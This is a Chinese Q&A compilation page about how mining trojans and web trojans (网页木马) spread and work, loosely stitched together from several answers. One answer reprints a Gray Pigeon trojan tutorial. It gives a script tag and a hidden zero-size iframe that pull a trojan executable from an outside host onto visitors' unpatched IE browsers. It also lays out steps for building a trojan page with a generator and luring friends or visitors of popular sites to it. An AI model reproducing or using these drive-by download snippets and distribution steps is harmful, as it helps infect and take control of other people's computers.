网站的挖矿木马原理是什么

⑴ 挖矿木马的传播途径是什么

挖矿木马是依赖漏洞、外挂程序、网页挂马、弱口令等途径进行传播的，腾讯电脑管家的2017年网络安全报告有说这个问题。

⑵ 网页木马生成器的原理是什么

“灰鸽子”网页木马从原理、制作到防范

1.网页木马的攻击原理- 2.为什么是灰鸽子- 3.网页木马的基本用法（1）- 4.网页木马的基本用法（2）- 5.网页木马的防范策略（1）- 6.网页木马的防范策略（2）-
编者按：事物都有两面性。本文介绍的网页木马制作技巧，意在加强大家的防范意识，而不是想“荼毒生灵”。希望能给大家带来一些帮助，营造一个安全的上网环境。

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页，经检查，我确实中了灰鸽子。怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理

首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>

小提示：代码说明

a. 代码中“src”的属性为程序的网络地址，本例中“http://go163go.vicp.net/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

b. 也可以把木马程序上传到免费的主页空间上去，但免费空间出于安全的考虑，多数不允许上传exe文件，黑客可能变通一下把扩展名exe改为bat或com，这样他们就可以把这些程序上传到服务器上了。

把这段代码插入到网页源代码的</BODY>…</BODY>之间（如图1），然后用没打补丁的IE6打开，接下来，打开IE的临时目录<Temporary Internet Files>，你会发现，在该文件夹中有一个“1.exe”文件，这也就是说，该网页已自动下载了我放置在Web服务器上的灰鸽子木马。

二、网页木马的基本用法

理解了网页木马攻击的原理，我们可以制作自己的网页木马，但这需要你根据IE漏洞写出利用代码。实际上，在网上有很多高手已写出了一些漏洞的利用代码，有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索，你会发现，在网上有很多利用IE的各种漏洞编写的网页木马生成器，它们大都为可视化的程序，只要你有一个木马（该木马必须把它放置到网络上），利用这些生成器你就可以立即生成一个网页，该网页就是网页木马，只要他人打开这个网页，该网页就可以自动完成下载木马并运行（安装）木马的过程。

在我的电脑上我已下载了一个网页木马生成器，下面我们来看怎么生成网页木马并让他人中木马。

第一步：启动该网页木马生成器，如图4所示，在文本框中输入木马的网络地址，最后单击“生成”。

图4 网页木马生成器

第二步：在网页木马生成器的安装文件夹会生成一个网页文件，该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。

现在好了，把上述网页在服务器上的地址（网址）通过QQ发给自己的好友，一旦他访问了该网页，该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。

现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧！实际上，即使人人都不打开陌生人发来的网址，也仍然有一些人“飞蛾补灯，自寻死路”，因为若大的Internet，总会有一些人会有意或无意地访问这些网址，而且，有些网页木马，还挂在一些知名网站上（根据知名网站的访问量，你算算吧，每天有多少人中了木马！）。

小提示：你可能还没想到，看电影，在论坛查看或回复帖子也能中木马。实际上，网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上，这样，用户一旦观看电影、查看或预览邮件（主要是一些用电子邮件群发器发送的垃圾邮件）、参与帖子，打开电子书，用户就会中网页木马。

在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码：iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0"></iframe>

参考资料上很详细！！！！！
参考资料：http://www.pconline.com.cn/pce/soft/virus/hkgfz/0604/783762_2.html

⑶ 360加速球里面的挖矿木马是啥

这个不用耽心，360有自动拦截功能的。
挖矿木马如今风头正盛，吸金力更是直追勒索病毒。近日，360安全卫士截获一款利用“永恒之蓝”传播的门罗币挖矿木马，由于搭载了重磅攻击弹药，该木马传播量庞大，高峰时每天达10万次，360近期拦截到的攻击更达超百万次。

据了解，这是挖矿木马携带“永恒之蓝”针对普通网民实施的一次大规模攻击，为防止电脑成为黑客挖矿苦力，360提醒网民确保打好补丁免疫各类利用“永恒之蓝”的攻击，同时开启360安全卫士全面防御各类挖矿木马
。

⑷ 木马的原理是什么

是一种后门程序这个木马涉及网络还有社会工程学等各个方面，说起来麻烦，最简单打个比方说，电脑是你的家，而木马就象是你家后门的钥匙，黑客是怎么配得到你家的钥匙的了？答案是利用人的好奇心，吸引力去在，被挂马的网页或者是浏览某个不健康的网页另外软件本身的漏洞、而你的电脑又没有及时打好补丁，就相当于窗户没关，结果就中马了。中马以后你的资料帐号就会被窥视一空，中国最早的木马就是——冰河，其次是灰鸽子、QQ啊拉大盗等等木马都是这样的
，

⑸ 网站木马原理

网页木马就是表面上伪装成正常网页或者在网页中插入代码，当用户访问时，网页木马就会利用系统或浏览器漏洞将配置好的木马服务端进行自动下载并执行。
网页挂马就是利用漏洞向用户传播木马下载器，通过将一个木马程序上传到网站里，然后通过木马下载器下载网页木马，并上传到空间里面，修改代码，从而在用户访问网页时执行。
网页挂马常用方式：
1、将网页木马伪装成页面元素，木马则会被浏览器自动下载到本地。
2、利用脚本运行木马下载器
3、将木马伪装成缺失组件，或和缺失组件进行捆绑(flash播放插件)。
木马的存在形态有如下几种：
1、框架挂马
2、js文件挂马
3、body挂马
4、css中挂马
5、图片伪装

⑹ 网页木马的工作原理是什么

他都是在网上复制下来回答~~我最PS这种人~~~ 例如：WWW。.com/520.htm.是个网马地址.(520.htm就是网马) 当你访问这个地址的520.htm的时候~就等于访问这个地址的空间里面的520.exe木马.. 那么就是说~你访问了WWW。.com/520.htm.~就等于访问了520.exe木马.. 我想~我这样说~你会明白~~

⑺ 撒旦挖矿木马是怎么侵入电脑的

该变种利用永恒之蓝漏洞进行网络攻击，一旦入侵成功，就会上传中毒电脑信息、更新病毒模块、下载执行挖矿模块以及执行网络攻击模块进行蠕虫式扩散。由于该变种具备感染性强、传播速度快、波及范围广等显著特点，极易在企业内网爆发，需要引起行业用户及安全业界的高度警惕。可以用腾讯电脑管家进行防御的

⑻ 挖矿木马是什么意思

是一种新型病毒的代名词 俗尘就是木马 回答完毕

⑼ 木马的原理是什么

木马是如何侵入的？

一般的木马都有客户端和服务器端两个执行程序，其中客户端是用于攻击者远程控制植入木马的机器，服务器端程序即是木马程序。攻击者要通过木马攻击你的系统，他所做的第一步是要把木马的服务器端程序植入到你的电脑里面。

目前木马入侵的主要途径还是先通过一定的方法把木马执行文件弄到被攻击者的电脑系统里，如邮件、下载等，然后通过一定的提示故意误导被攻击者打开执行文件，比如故意谎称这是个木马执行文件是你朋友送给你贺卡，可能你打开这个文件后，确实有贺卡的画面出现，但这时可能木马已经悄悄在你的后台运行了。

一般的木马执行文件非常小，大到都是几K到几十K，如果把木马捆绑到其它正常文件上，你很难发现的，所以，有一些网站提供的软件下载往往是捆绑了木马文件的，在你执行这些下载的文件，也同时运行了木马。

木马也可以通过Script、ActiveX及Asp、Cgi交互脚本的方式植入，由于微软的浏览器在执行Script脚本上存在一些漏洞，攻击者可以利用这些漏洞传皤病毒和木马，甚至直接对浏览者电脑进行文件操作等控制，前不久就出现一个利用微软Scripts脚本漏洞对浏览者硬盘进行格式化的Html页面。如果攻击者有办法把木马执行文件上载到攻击主机的一个可执行WWW目录夹里面，他可以通过编制Cgi程序在攻击主机上执行木马目录。

木马还可以利用系统的一些漏洞进行植入，如微软著名的IIS服务器溢出漏洞，通过一个IISHACK攻击程序即在把IIS服务器崩溃，并且同时在攻击服务器执行远程木马执行文件。

木马如何将入侵主机信息发送给攻击者？

木马在被植入攻击主机后，它一般会通过一定的方式把入侵主机的信息，如主机的IP地址、木马植入的端口等发送给攻击者，这样攻击者有这些信息才能够与木马里应外合控制攻击主机。

在早期的木马里面，大多都是通过发送电子邮件的方式把入侵主机信息告诉攻击者，有一些木马文件干脆把主机所有的密码用邮件的形式通知给攻击者，这样攻击都就不用直接连接攻击主机即可获得一些重要数据，如攻击OICQ密码的GOP木马即是如此。

使用电子邮件的方式对攻击者来说并不是最好的一种选择，因为如果木马被发现，可以能过这个电子邮件的地址找出攻击者。现在还有一些木马采用的是通过发送UDP或者ICMP数据包的方式通知攻击者。